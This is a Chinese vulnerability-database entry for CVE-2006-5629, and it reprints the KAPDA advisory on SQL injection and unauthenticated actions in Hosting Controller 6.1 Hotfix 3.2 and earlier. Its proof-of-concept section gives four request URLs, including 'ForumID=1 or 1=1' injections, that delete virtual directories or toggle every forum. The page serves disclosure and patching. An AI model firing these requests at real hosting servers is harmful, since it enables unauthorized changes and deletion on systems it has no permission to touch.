Hotfix Hosting Controller多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111396 漏洞类型 SQL注入
发布时间 2006-10-27 更新时间 2006-11-02
CVE编号 CVE-2006-5629 CNNVD-ID CNNVD-200610-546
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-546
|漏洞详情
Hotfix的HostingController中存在多个SQL注入漏洞,远程攻击者可以通过(1)DisableForum.asp和(2)enableForum.asp的ForumID参数执行任意SQL命令。
|漏洞EXP
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.

SQL_Injection, Command Injection

-------

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006

Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.

Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------

Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net] 

# milw0rm.com [2006-10-27]
|参考资料

来源:BID
名称:20661
链接:http://www.securityfocus.com/bid/20661
来源:MISC
链接:http://www.kapda.ir/advisory-442.html
来源:SECTRACK
名称:1017103
链接:http://securitytracker.com/id?1017103
来源:XF
名称:hostingcontroller-multiple-sql-injection(39036)
链接:http://xforce.iss.net/xforce/xfdb/39036
来源:BID
名称:26862
链接:http://www.securityfocus.com/bid/26862
来源:BUGTRAQ
名称:20071213HostingController-MultipleSecurityBugs(ExtremelyCritical)
链接:http://www.securityfocus.com/archive/1/archive/1/485028/100/0/threaded
来源:MILW0RM
名称:4730
链接:http://www.milw0rm.com/exploits/4730
来源:VUPEN
名称:ADV-2006-4296
链接:http://www.frsirt.com/english/advisories/2006/4296
来源:SECUNIA
名称:22607
链接:http://secunia.com/advisories/22607
来源:SECUNIA
名称:28973
链接:http://secunia.com/advisories/28973
来源:hostingcontroller.com
链接:http://hostingcontroller.com/english/logs/Post-Hotfix-3_3-sec-Patch-ReleaseNotes.html